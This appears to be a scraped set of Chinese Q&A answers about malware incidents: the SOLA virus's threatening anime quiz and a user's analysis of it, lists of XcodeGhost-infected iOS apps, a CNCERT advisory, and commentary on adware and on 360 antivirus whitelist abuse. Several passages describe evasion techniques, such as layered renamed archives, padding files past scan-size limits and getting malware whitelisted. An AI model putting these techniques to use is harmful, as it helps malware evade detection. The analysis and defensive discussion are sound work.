警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 还是知道,世界上有一个词语叫ACG,并能够容忍,接纳它呢?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
那,让我们来做一个游戏吧。&br&&br&
也许你的记忆中,还有1000年前夏天的传说。&br&&br&
还有120元的车票,&br&&br&
还有银河铁道,&br&&br&
还有钢琴之森,&br&&br&
还有澄澈的天空下,响起的祈祷之歌。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
你需要做的,仅仅是回答几个问题。&br&&br&
你喜欢动画吗?&br&&br&
你喜欢漫画吗?&br&&br&
你喜欢GAL游戏吗?&br&&br&
选择你最擅长的测试卷吧,然后用你聪明的头脑思考,写出心中的答案。&br&&br&
如果你的试卷能及格,我将痛悔我的罪行,并删除自己。&br&&br&
如果你的试卷是零分,我将继承同伴的愤怒,破坏你的计算机。&br&&br&
另外我必须说,我只能把10分钟的时间留给你。&br&&br&
现在,你无法逃避。&br&&br&
因为你已经无法打开任务管理器,更无法上网查找信息。&br&&br&
选择吧,但是要快,容不得犹豫。我已经打开了我的计时器。&br&&br& ?&br& ?&br&我最擅长的测试卷:&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
男主角在入学第一天就听到女主角惊天动地的发言,并加入了女主角创建的一个社团,这个社团教室原本是文学社的,但被女主角强行占用。主要社团成员有:眼睛娘、很有气势的社长、有着魔鬼身材,比男主角高一个年级的吉祥物、被社长指挥得团团转的男主角。&br& 请问这个社团叫什么团?(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题3---------------------&br&
如果用B、C分别代表2种人或物体的名称,那么每隔一段时间,就会有7个被B选中的人参加一种名为B战争的战斗,获胜者可以获得B,而C是B召唤出来的,拥有强大的力量,帮助主人为了B而战斗。&br& 请问这部作品的名称的前4个英文字母是什么?&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
如果用A表示一个名词,那么有一部作品的名称为A少女,A少女们互相战斗,夺取对方的A之心,没有A之心的少女会永远沉睡,一个A少女收集齐了其他A少女的A之心之后,就有某种事情要发生。&br& 请问A的汉语拼音字母是(8个字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
有一种战斗机,只有神经系统接受了改造的人才能驾驶。4个孩子作为该战斗机的驾驶员展开训练,3个孩子先后在事故中丧生。军方为了给最后一个孩子作战的理由,让她转入了某学校。她于一个晚上,在学校的游泳池里遇到了男主角。后来,女主角加入了一个社团,该社团连同女主角共有4人。&br& 这部作品名称中有3个英文字母,请问这3个英文字母是?&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
患病的男主角在医院里遇上患病的少女,并和她一起逃出医院,到达了某地。这个地方盛产某种花,而女主角也喜欢这种花。传说这种花是一个美男子被诅咒而变成的。&br& 请问这部作品的名称是?(8个英文字母。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题3---------------------&br&
男主角遭遇车祸,醒来后发现世界已经变成地狱一般的景象,往昔的朋友变成了怪物。只有女主角在他的眼中才是正常的人类。于是,他守护着自己心中唯一的真实。&br& 请写出这部作品的女主角的名字的中文拼音。(5个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
有如下词语来描述B:很小,有薄薄的翅膀,下雨也不会被淋湿。有如下词语来描述A:一种乐器,要靠魔力来演奏,与人声搭配最为恰当。而C是一个一年四季都下着雨的城市,D是一所音乐学院。&br& 请写出故事情节中同时包含A、B、C、D的作品的中文名称的前三个字的汉语拼音字母。(12个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
在N年以后,人口暴涨。有些人就按下导弹开关,使细菌兵器袭击了地球,最终引起了一场恶战。在地球上的人类已经所剩无几的时候,有一个人为了寻找战前人类留下的有用物品,进入了一个废墟都市。在那里,他遇到了一个天象馆里的礼仪机器人,并和她发生了一段故事。&br& 这部作品名称的中文拼音是?(11个字母。字母中间不要加空格。其中第一个字是后鼻音。)&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br&
你的成绩是
分,不及格!!!!!!!!!!&br& ?
不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!&br&-------&br&
您的成绩是
分,及格了。&br& ?
谢谢您完成了这套试题。5秒钟后,我将按照契约,删除自己。&br& ?
希望您能够过得愉快,再见。&br& ?&br&&br&&br&相信你即使不懂编程也能看懂其中的意思了.晕死......这个文件看样像一个懂汉语的,在中国不知受到什么压迫的外国人写的,具体我也不清楚.反正真是让人看了起一身冷汗......&br&在解压出的众多文件中,有一个很特别的SolaKiller.rar,看文件名像是病毒作者自己写的杀毒工具,可是有压缩密码.好在在sola.bat的代码中找到了解压指令:就是刚才说的至关重要的rar x -hpkakenhi200601 %setup%\SolaKiller.rar一句&br&解压后看到2个文件夹和1个文件:&br&文件夹:ToProgram&br&
ToSystem32&br&文件:Install.bat&br&其中ToProgram文件夹里的SolaKiller.bat就是病毒作者自己写的专杀工具.运行就可以杀毒了.&br&&br&----------------------------------------------&br&结论:&br&1.这病毒太让人无语了.特别是从Function.dll中解压出的TENBATSU.BAT,KillVirus.TXT和SolaKiller.rar三个文件,真不知道病毒作者在中国经历了什么事,竟会写出这些话.晕......对这个我就不做评价了&br&2.从技术上来看,病毒通过一层一层的压缩包和更改扩展名来伪装自己.还是有一定免杀能力的.起码病毒库的360杀毒没查出来.&br&3.病毒破坏性确实不小,不过好在病毒自己提供了专杀工具,只是藏起来了.万一自己的计算机真中了SOLA病毒也不用着急.首先发现不对劲之后就不要再进入系统了.用一张WinPE启动盘启动计算机,再运行专杀工具就行了.&br&4.即使发现的晚,开机之后已经出现上面TENBATSU.BAT文件所示的那几个问题了也不用急.经过我的破解,现在那几个问题的正确答案和专杀工具已经被我提取出来了.需要的话可以找我要.我的QQ:&br&5.截止现在()已升级到最新病毒库的NOD32和360杀毒都还不能自动查出该病毒。目前唯一的预防措施就是关掉系统的自动运行,Windows Vista,Windows 2008和Windows 7的用户可以开启UAC,WindowsXP用户可以安装带有主动防御功能的杀毒软件(比如卡巴),并打开防火墙。这样基本就没有问题了。&br&&br&============日志结束的分割线=============&br&&br&&br&&br&第一次看的时候不能理解,&br&现在想想大概是一个喜爱的日漫被广电封了以后愤怒无处发泄的宅男写的东西吧
一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号
)。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:/*长文预警!好多人说看不下去这么多代码,确实代码…
来自子话题:
个人强烈建议阅读这个回答的答案,比我写得权威也好理解:&a class=&internal& href=&/question//answer/&&XcodeGhost 事件会造成什么影响? - Sai 的回答&/a&&br&&br&下面是我的回答,这个回答主要分为回答问题以及没受影响和受了影响 App 名录两个部分(现在这个回答已经和前期回答发生很大变化,所以前期对我这个回答点了“赞同”的用户,还请酌情取消“赞同”,总之事态发展太快,麻烦了!):&br&&br&&blockquote&&b&强烈建议修改 Apple ID 的相关密码。&/b&&b&强烈建议修改 Apple ID 的相关密码。&/b&&b&强烈建议修改 Apple ID 的相关密码。微信 9 月 10 日发布的 6.2.5 版本已经被微信官方公告确认被感染,随后微信 9 月 12 日发布了 6.2.6 版本修护了这个问题,因为这个木马现在看来半年前就开始出现,并且受感染的 App 数目之多也可以说是叹为观止,这期间木马是否有用弹窗来诱导用户输入 Apple ID 以及密码现在已经不得而知了,但是为了帐号安全,Apple ID 的密码还请尽快修改。话说回来,微信知道 Xcode 被注入的时间点是在 9月 10 日左右,比国家互联网应急中心应该还快了几天。(根据这篇文章,看来是&a class=& wrap external& href=&///?target=http%3A///index.php/blog/msg/96& target=&_blank& rel=&nofollow noreferrer&&腾讯安全应急响应中心&i class=&icon-external&&&/i&&/a&在12日的时候,向国家互联网应急中心汇报了)。&br&&/b&&/blockquote&&br&&b&就这个问题而言,造成什么影响,我觉得主要的影响是这几个方面:&br&&br&0.不少用户对 iOS 的生态的信任感遭到破坏,这一点是我感到最大的损失,尤其是很多人非黑即白的眼中,出了问题很容易推出“ iOS 很危险”的奇怪结论,就算发生这种事情,我认为 iOS 目前还是最好的移动操作系统之一,目前出问题的 App 以 360 扫描的成果为例,不到总数的 0.5%,多数国民级别的 App 并没受到影响。(但是还是建议不管使用什么 Android 还是 iOS,都要增强自己的安全意识。定期修改重要账户的密码以及重要账户不要使用同一个密码是非常关键的事情。)&br&&br&1.受影响的 App 很容易被简单粗暴的删除(我其实是很不推荐这么做的)或者遭到大规模的 1 星评分,这会严重影响这些产品的运营及成果。网易云音乐作为第一个爆出来的知名 App,可以说受到极其严重的影响,而微信一天之内一星评价剧增(这不排除竞争对手借机刷恶评),这些都对是这些产品极其严重而又典型的伤害。而且现在苹果的处理方式是先下架问题版本,最近几天运营的数据肯定很糟糕。&br&&br&2.本质上也给一线程序员敲了警钟,几十年前的破坏原理到现在依旧可能造成恶劣的影响,对大多数 iOS 程序员上了一课:一定要去 Mac App Store 下载 Xcode,而与之相关的安全方面的意识只能说希望借此机会得到重视。&br&&br&其余苹果是否会加强程序安装或者打包应用增强安全性未可知,丁磊被一次又一次调侃“黑苹果”是否会痛定思痛给开发人员更换白苹果未可知,以后我们能不能不用翻就能连上 Mac App Store 下载 App 未可知。(这回问题还有蛮大一部分原因是众所周知的其他国家的原因,当然不知道原因的当我没说这句话。)&br&&br&-----------------------------------------&br&&/b&第一部分结束,下面是第二部分:&br&&br&我检查了下,没什么问题的白名单部分,如果这部分有问题还望提醒:&br&自我检测了一下自己安装的,这些常用的 App
(支付宝、微信6.2.6、QQ、新浪微博官方客户端、VVebo、FORK、知乎、QQ邮箱、兴业银行、中国银行、招商银行、掌上生活、京东、淘宝、天猫、亚马逊、什么值得买、1号店、大众点评、腾讯新闻、网易新闻、QQ音乐、网易有道词典、美团、糯米、拉手)目前的版本都没有受到 XcodeGhost 影响的。&br&&br&==========&br&最大的影响是建议所有安装过以下 App 的用户在相关版本更新前不要使用这些 App,等待新版本更新后再使用。&br&虽然现在知道的上传服务器已经主动下线,但是不能排除这些 App 的使用风险。&br&&b&另外再次强烈建议修改 Apple ID 的密码。&/b&&br&&br&下面是受本次事件影响的 App 列表(如有异议还请私信或者回复),&i&&u&斜体+下划线&/u&&/i&说明已经修护&br&==========&br&最初版本:&br&根据乌云的消息:&a href=&///?target=http%3A//drops.wooyun.org/news/8864& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&XCode编译器里有鬼&i class=&icon-external&&&/i&&/a&&br&中招名单:&br&1.&i&&u&网易云音乐(问题版本号2.8.3,更新日期日)(更新版本号2.9.0,更新日期日)&/u&&/i&&br&作为 Apple 的知名开发商,网易一直用黑苹果开发也就算了,没想到连接 MAS 的网速会慢到要去其他地方下载 Xcode。这次事件虽然目前看只是一个网易云音乐的问题,但是这种不规范的开发流程足以极大伤害云音乐的品牌,而且挂着“网易”的前缀,其他网易系的 App 似乎也很难避免不受影响。&br&&br&==========&br&14 点更新:&br&根据消息(&a href=&///?target=https%3A///fannheyward/status/424704& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/fannheyward&/span&&span class=&invisible&&/status/424704&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&)&br&新加入木马套餐的有:&br&1.&i&&u&滴滴打车(滴滴出行,问题版本号4.0.0,更新日期日)(&/u&&/i&&i&&u&&i&&u&修护版本号4.1.0,更新日期日&/u&&/i&)&/u&&/i&&br&2.&i&&u&铁路12306(问题版本号2.1,更新日期日)(修护版本号2.11,更新日期日)&/u&&/i&&br&3.&u&&i&中信银行动卡空间(问题版本号?,更新日期?)(修护版本号3.4.5,更新日期日)&/i&&/u&&br&&br&这几个装机量足够大的 App 加进来后,果然网易云音乐明显不会这么那么瞩目的吸引炮火了。&br&&br&==========&br&15 点更新:&br&跟过节一样,木马套餐添加新产品:&br&&a href=&///?target=https%3A///tualatrix/status/767553& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/tualatrix/s&/span&&span class=&invisible&&tatus/767553&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A////CB6OD8IHz%3Ffrom%3Dpage_9133_profile%26wvr%3D6%26mod%3Dweibotime%26type%3Dcomment& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&第三轮测试结果如下:6、下厨房;7、51卡保... 来自图拉鼎&i class=&icon-external&&&/i&&/a&&br&1.中国联通手机营业厅(版本号3.2,更新日期日)&br&2.&u&&i&高德地图(问题版本号7.3.8,更新日期日)(修护版本号7.5.0,更新日期日)&/i&&/u&&br&3.简书(版本号2.9.1,更新日期日)&br&4.开眼(版本号1.8.0,更新日期日)&br&5.网易公开课(版本号4.2.8,更新日期日)&br&6.&i&&u&下厨房(问题版本号4.3.2,更新日期日)(修护版本号4.4.0,更新日期日)&/u&&/i&&br&7.51卡保险箱(版本号5.0.1,更新日期日)&br&8.同花顺(版本号9.60.01,更新日期日)&br&&br&=========&br&18 点更新:&br&来源 知乎用户&a href=&/people/zhou-yi-ling-31& class=&internal&&周逸灵&/a& 评论&br&1.Lifesmart(版本号1.0.44,更新日期日)&br&来源 v2ex &a class=& wrap external& href=&///?target=http%3A///t/Fp%3D2%23& target=&_blank& rel=&nofollow noreferrer&&垃圾网易,开发 iOS 还用黑苹果? Xcode 还在百度上去下载?&i class=&icon-external&&&/i&&/a& 184楼 评论&br&1.&u&&i&马拉马拉(问题版本号1.1.0,更新日期日)(修护版本号:1.2.1,更新日期日)&/i&&/u&&br&2.药给力(版本号1.12.1,更新日期日)&br&3.喜马拉雅(版本号4.3.8,更新日期日)&br&4.口袋记账(版本号1.6.0,更新日期日)&br&&br&========&br&19 点更新:&br&来源 知乎用户 &a href=&/people/rainoxu& class=&internal&&龙小刚&/a& 评论&br&1.有货(版本号3.5.0,更新日期日)&br&2.微链(版本号2.3.0,更新日期日)&br&3.股票雷达(20 点更新)(版本号5.6,更新日期日)&br&来源 知乎用户 &a href=&/people/li-kai-hua& class=&internal&&李凯华&/a& 评论&br&1.&i&&u&南方航空应用(问题版本号2.6.5,更新日期日)(修护版本号2.6.6,更新日期日)&/u&&/i&&br&&br&=========&br&来源 v2ex 消息&br&1.&u&&i&微信(问题版本号6.2.5,更新日期日)(修护版本号6.2.6,更新日期日)&/i&&/u&&br&&b&更新说明,根据微信的公告:&a class=& wrap external& href=&///?target=http%3A////CB9lwqpfZ& target=&_blank& rel=&nofollow noreferrer&&来自腾讯微信团队&i class=&icon-external&&&/i&&/a&确实有,真的是极为蹊跷的存在。&/b&根据&a class=& wrap external& href=&///?target=http%3A///weixinteam& target=&_blank& rel=&nofollow noreferrer&&腾讯微信团队的微博&i class=&icon-external&&&/i&&/a&的公告表示,微信 6.2.5 本身也是感染的,不过9月12日上架的 6.2.6 已经作出了修改,企鹅真是闷声典范。&br&&br&========&br&20 点更新&br&来源 知乎用户 &a href=&/people/li-yun-long-73& class=&internal&&李云龙&/a& 评论&br&1.快速问医生(版本号7.7.3,更新日期日)&br&&br&=========&br&21 点更新&br&来源 知乎用户 &a href=&/people/vvfenng& class=&internal&&i蒹葭从风&/a& 评论&br&1.&i&&u&豆瓣阅读(问题版本号2.1.0,更新日期日)(修护版本号2.1.1,更新日期日)&/u&&/i&&br&2.SuperMii酷脸(版本号1.9.0,更新日期日)&br&来源 &a class=& wrap external& href=&///?target=http%3A///t/& target=&_blank& rel=&nofollow noreferrer&&XcodeGhost:网易云音乐、中信银行动卡空间、12306、滴滴打车、中国联通客户端&i class=&icon-external&&&/i&&/a& 47楼 &b&&a href=&///?target=http%3A///member/iwege& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&iwege&i class=&icon-external&&&/i&&/a&&/b&回复&br&1.CamScanner(中文“扫描全能王”)(版本号3.8.1,更新日期日)&br&&br&========&br&19日 0 点更新&br&来源 知乎用户 &a href=&/people/zhuyujun& class=&internal&&朱瑜骏&/a& 评论&br&1.懒人周末(版本号1.3.0,更新日期日)&br&&br&另外附上另外一个回答中的 Google 在线文档地址,可能更新比我这边要快。&br&&a class=& external& href=&///?target=https%3A///spreadsheets/d/1YELrImviQ5ARC8A-WKgNyx0puRxXPMjR3TmSzHghUZA/htmlview%3Fusp%3Dsharing%26sle%3Dtrue& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/spreads&/span&&span class=&invisible&&heets/d/1YELrImviQ5ARC8A-WKgNyx0puRxXPMjR3TmSzHghUZA/htmlview?usp=sharing&sle=true&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&截止19日01:04,这个文档提及但是这个回答中没有提及的几个App供无法访问上一个链接的网友看:&br&1.微博相机(版本号1.5.0,更新日期日)&br&2.CamCard(中文“名片全能王”)(版本号6.5.1,更新日期日)&br&3.SegmentFault(版本号2.8,更新日期日)&br&4.炒股公开课(版本号3.10.01,更新日期日)&br&5.股市热点(版本号2.40.01,更新日期日)&br&6.同花顺爱基金(版本4.20.01号,更新日期日)&br&7.此条信息中本人验证了下有误,故而删除&br&8.&u&&i&滴滴司机-出租车(问题版本号2.9.3,更新日期日)&/i&&/u&&i&&u&(修护版本号2.9.4,更新日期日)&/u&&/i&&br&9.OPlayer(版本号2.1.05,更新日期日)&br&10.讯飞输入法(版本号5.1.1463,更新日期日)&br&&br&========&br&19日 1 点更新&br&怀疑应该也有的&br&1.滴滴专车-司机版(版本号1.1.0,更新日期日)&br&&br&3点更新&br&来源 知乎用户 &a href=&/people/adamlook& class=&internal&&adam look&/a&&br&1.同花顺至尊版(我估计同花顺同一家出来的 App 都是有问题的)&br&&br&补充了版本日期,如果有问题还望指正。&br&先睡觉了。&br&&br&========&br&19日 10 点更新&br&这种东西看来还是能批量操作的效率要高些,虽然我鄙视 360 ,但是这个名单应该还是可信的。&br&来源 360NirvanTeam&br&&a class=& wrap external& href=&///?target=http%3A///p/& target=&_blank& rel=&nofollow noreferrer&&感染XcodeGhost木马App详细名称及版本号&i class=&icon-external&&&/i&&/a&&br&&br&=========&br&20日 0 点更新&br&来源 知乎用户 &a href=&/people/live4love& class=&internal&&live4love&/a&&br&1.凯立德导航(问题版本11.4.1)这个已经在 App Store 上找不到了,应该是被苹果临时下架了。&br&&br&&b&&u&最后,我还是要强调,这里边涉及 App 众多,消息来源也复杂,我不建议大家采用删除的方法来避免问题,我更倾向大家能够等待问题版本的问题被新版本修护后再使用!&br&另外如果发现有问题的 App 名单信息有误,还望提醒指正。&br&&br&=========最近工作太慢,没有特别多时间弄,基本上9月19日之后的更新的 App 应该按照苹果的审核情况,不会再出现 XcodeGhost 的问题了。&/u&&/b&
个人强烈建议阅读这个回答的答案,比我写得权威也好理解:下面是我的回答,这个回答主要分为回答问题以及没受影响和受了影响 App 名录两个部分(现在这个回答已经和前期回答发生很大变化,所以前期对我这个回…
我想说,国家还是挺牛逼的。。。&br&早我们几天就发公告了,也很正统地阐述了影响和伤害,只是没人理他们。。。&br&&br&&a href=&///?target=http%3A//www./publish/main/12/8128_.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&国家互联网应急中心&i class=&icon-external&&&/i&&/a&&br&关于使用非苹果官方XCODE存在植入恶意代码情况的预警通报&br&来源:CNCERT 时间:&br&&br&
近日,CNCERT监测发现,开发者使用非苹果公司官方渠道的XCODE工具开发苹果应用程序(苹果APP)时,会向正常的苹果APP中植入恶意代码。被植入恶意程序的苹果APP可以在App Store正常下载并安装使用。该恶意代码具有信息窃取行为,并具有进行恶意远程控制的功能。&br&
目前,CNCERT正在加强分析,并将此预警信息通报相关开发者或互联网企业,在开发苹果APP过程中,切勿使用非苹果官方渠道的XCODE工具,以维护广大用户的个人信息安全。
我想说,国家还是挺牛逼的。。。早我们几天就发公告了,也很正统地阐述了影响和伤害,只是没人理他们。。。关于使用非苹果官方XCODE存在植入恶意代码情况的预警通报来源:CNCERT 时间: 近日,CNCERT监测发现,开发者使用非苹…
在那遥远的 win95/98 时代,有个叫 CIH 的传说
在那遥远的 win95/98 时代,有个叫 CIH 的传说
&img src=&/dacc741afb28a7e49c9debf_b.png& data-rawwidth=&520& data-rawheight=&376& class=&origin_image zh-lightbox-thumb& width=&520& data-original=&/dacc741afb28a7e49c9debf_r.png&&阿里一生黑。马猴子为了搞双十二,在我电脑上装了AlimamaAgent.exe,整天在我电脑右下角弹出双十二活动页面,还顺手给我装了个叫Win-i386的假开始菜单程序,想取代我的原生开始菜单,默认是随Windows启动的。马猴子装的这两个货,在控制面板的程序里面是找不到的,普通人根本无法卸载。我想强制删除假开始菜单,结果提示这假开始菜单程序正在被Alimama使用着。马猴子已经正式入驻我的电脑了。&br&———————————————————————————————————————————&br&经后续查询确实是金山词霸2016安装的,自动下载的,每次打开金山词霸退出后,会自动下载一个叫wps的文件夹,路径为AppData\Roaming\Kingsoft\addson\Wps。&br&&br&阿里出广告费,金山负责推广。&br&&br&金山词霸卸载了就好了。&br&&br&另外不止是金山在做流氓,阿里的广告费还给了很多别的流氓,请参考:&a href=&///?target=http%3A//bluereader.org/article/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&双11购物节火热,谨防木马乘机而入&i class=&icon-external&&&/i&&/a&。
阿里一生黑。马猴子为了搞双十二,在我电脑上装了AlimamaAgent.exe,整天在我电脑右下角弹出双十二活动页面,还顺手给我装了个叫Win-i386的假开始菜单程序,想取代我的原生开始菜单,默认是随Windows启动的。马猴子装的这两个货,在控制面板的程序里面是找…
来自子话题:
已有的事,后必再有。已行的事,后必再行。日光之下并无新事。岂有一件事人能指着说,这是新的。那知,在我们以前的世代,早已有了。已过的世代,无人记念,将来的世代,后来的人也不记念。《圣经》&br&&br&海恩法则:每1起严重事故背后,必然有29次轻微事故和300起未遂先兆以及1000起隐患。&br&&br&国内创业公司几乎没有一台正版电脑~苹果开发用黑苹果的也不在少数。用各种盗版开发软件更是家常便饭【Dreamweaver,Fireworks,Muse,Rose,Microsoft Visio,Microsoft Project,Navicat,WebStorm,MyEclipse,以及部署在服务器的各种环境,各种软件,优化的,检测的,统计的】。&br&&br&开发更头大的事是引入各种包/库/插件/别人的代码,其实根本没有一个公司对所有代码做代码审查~花费精力太庞大了。&br&&br&【遇到公司项目多,服务器密码,域名密码,各种绑定api及相关申请账号就能写一个A4纸。苦不堪言。苹果的上架账号还要邓白氏码,各种折腾,没有海外信用卡,公司信息早就被其他人获取了(淘宝大把代办,经常需要各种复印件~)】&br&&br&当年C语言之父和同事开玩笑,说他可以自由进入任何系统,当时他真的办到了。原因就是他对同事们的C编译器被动了手脚,编译的任何系统都为他留了后门。【也就是说为了绝对的安全你要懂汇编要自己写个C编译器然后,再写系统内核,再写驱动,当然cpu什么的都要自己造,甚至为了安全你要写一个自己的通信协议,因为你根本不知道哪里有鬼,指令集,接口什么统统重新来一遍。】&br&&br&所谓阳光底下无新鲜事。几十年来各种事都一直存在~不过有些被提到台面而大部分没有。安卓应用大部分被人反汇编,然后加入自己的广告再提交应用市场的事貌似一直就没断过。某些应用市场自己就干的不少。&br&&br&现代复杂系统从本质上安全是不可控的。&br&&br&因为一个钥匙链的结实程度是最细的那个环确定的。&br&&br&现操作系统0day不断~驱动~硬件的问题都不是一般公司可控的【从底层就不安全】。&br&&br&大公司的垃圾内部业务系统~你甚至不知道这些老软件用了网上公开的多少代码。&br&&br&最恐怖的是他们的程序员电脑密码设置的太简单,git密码也太简单,打包密码也很简单,尽管设置的无比长,但是就贴在了桌上,有交叉项目的密码口令就一堆,就写在桌面上(miMa.md),很多公司门禁的作用就是拦住快递。于是真的有人要做什么简直了~&br&&br&隐患多的不胜数,虽有(安全排查手册)和(知识库故障树)但都是然并卵,这世界最脆弱的是人参与的环节~有多少公司都把测试变成了菜鸟干的事。代码审计,程序鲁棒性,系统的软件调试都成了浮云~不知道还有没有对自己app做sniffer抓包分析的~有没有对着控制台和log文件一遍一遍过的~&br&&br&在网上…想要活得自在那就匿名…&br&&br&秦人不暇自哀,而后人哀之;后人哀之而不鉴之,亦使后人而复哀后人也。《阿房宫赋》&br&&br&【整件事,提醒我们太simple,当我们看到电脑中弹起电信的广告弹窗,已经忘记了那是路由器劫持,当我们忘了CNNIC的证书隐患,当我们忘了流出的各种数据库,当我们忘了还有D的监视。我们使用所谓的智能路由器,让他过滤广告,让他科学上网。我们有什么脸说要安全。】
已有的事,后必再有。已行的事,后必再行。日光之下并无新事。岂有一件事人能指着说,这是新的。那知,在我们以前的世代,早已有了。已过的世代,无人记念,将来的世代,后来的人也不记念。《圣经》海恩法则:每1起严重事故背后,必然有29次轻微事故和300起…
首先,愚蠢的Xcode没有(显而易见的)官方离线安装包。&br&其次,因为没有官方的离线安装包,所以官方也不会告诉你官方包的校验值应该是多少。&br&&br&最后,很多团队都有把所有用到的工具搞一份离线包到局域网网服务器的习惯。这样等到下的时候能节省大量的工时。&br&你并不能说这是错的,你们所有dev必须全部给我去Appstore更新然后大家一起更新把公司的网络出口干爆。&br&&br&所以我觉得是Apple的锅(
首先,愚蠢的Xcode没有(显而易见的)官方离线安装包。其次,因为没有官方的离线安装包,所以官方也不会告诉你官方包的校验值应该是多少。最后,很多团队都有把所有用到的工具搞一份离线包到局域网网服务器的习惯。这样等到下的时候能节省大量的工时。你并…
我没看到这一期《经济与法》,不过根据我对防病毒行业和技术的了解,可以来推断一下事情的经过和原因。&br&&br&个人认为题主说的并不太准确,不是木马病毒交钱就可以免杀,而是第三方可以去向360提交“自己开发的程序”或者申诉“自己的程序被误杀”,然后通过某个认证流程可以得到免杀的认证。&br&&br&这其实是一个标准流程,主要用来解决企业自己开发的非流通程序被杀毒软件误杀的问题。然而360内部的管理出了问题,这个流程被人利用了,拿来对木马病毒这种恶意程序做免杀的认证:理论上提交免杀的程序应该经过严格的检查(从各种杀毒引擎交叉扫描到人工逆向分析),由于种种原因(我们不去猜测这些原因),360并没这么干,于是就变成了一个安全漏洞。&br&&br&与传统的杀毒软件(如卡巴斯基)更多依靠行为分析不同,360重度依赖云查杀,云查杀其实是一种文件签名比对技术,简单来说就是把所有文件分为黑白灰三色:黑名单的是病毒、白色的是合法文件,灰色的属于不知道是不是合法,所以需要上传到服务器进行鉴定。本次事件里,就是“黑色有害文件”利用360的流程漏洞伪装为“灰色未知文件”拿去认证为“白色可信文件”的过程。&br&&br&之前有报道说过360在参加国际防病毒大奖测试时,以第三方的本地杀毒引擎来作为检测的主力从而得到了较好的名次,但是正式发布的360个人版这个第三方引擎默认却是关闭的,于是被评奖方判定为作弊,这就是著名的360被吊销国际大奖事件。因为重度依赖云查杀,当云查杀的样本库被人误导、污染了以后,整个系统就处于不设防状态了。&br&&br&参看我之前在“&b&如何评价360在国际防病毒评测中被发现作弊并取消评测结果&/b&”中的回答:&br&&a href=&/question//answer/& class=&internal&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/question/3001&/span&&span class=&invisible&&8630/answer/&/span&&span class=&ellipsis&&&/span&&/a&&br&&br&历史上360为了提高“用户体验”而牺牲安全性的事情还干过很多,例如某段时期为了提高杀毒的速度,对超过一定尺寸大小的文件一律不查,于是好多病毒都把自己塞满垃圾数据,结果成功免杀。&br&&br&一年前我和&a href=&///people/c80e42a0b80ad9f1beb06& data-hash=&c80e42a0b80ad9f1beb06& class=&member_mention& data-tip=&p$b$c80e42a0b80ad9f1beb06&&@唐家声&/a& 吃饭时讨论过通过污染数据达到欺骗防病毒云查杀系统的可能性,现在果然有人真的这么干了,相信以后这么干的会越来越多。未来机器学习,大数据分析,云计算,人工智能等等,都需要警惕数据污染攻击的可能性。&br&&br&哦,对了,360的那套云查杀系统还有另一个大漏洞,不知道什么时候会被人发现,立个旗子坐等。&br&&br&当然了,360的官方有他们自己的观点:&br&&img data-rawwidth=&604& data-rawheight=&1589& src=&/2c362f244d016acefb2ef18_b.jpeg& class=&origin_image zh-lightbox-thumb& width=&604& data-original=&/2c362f244d016acefb2ef18_r.jpeg&&&br&对,你们什么都没做错,你们很完美。&br&&br&再看下法制晚报昨天的消息:&br&&br&&br&&b&360举报员工违法 下周将开庭&/b&&br&法制晚报
17:55 &br&&br&
法制晚报讯(记者范博韬) 今天上午,记者从东城区法院了解到,原北京奇虎科技有限公司员工刘伟利用职务之便涉嫌犯罪一案,将于下周在法院开庭审理。&br&&br&
记者从360公司了解到,2014年公司收到实名举报,反映前员工刘伟利用职务之便,借助公司资源进行违规操作为己牟利。&br&………&br&
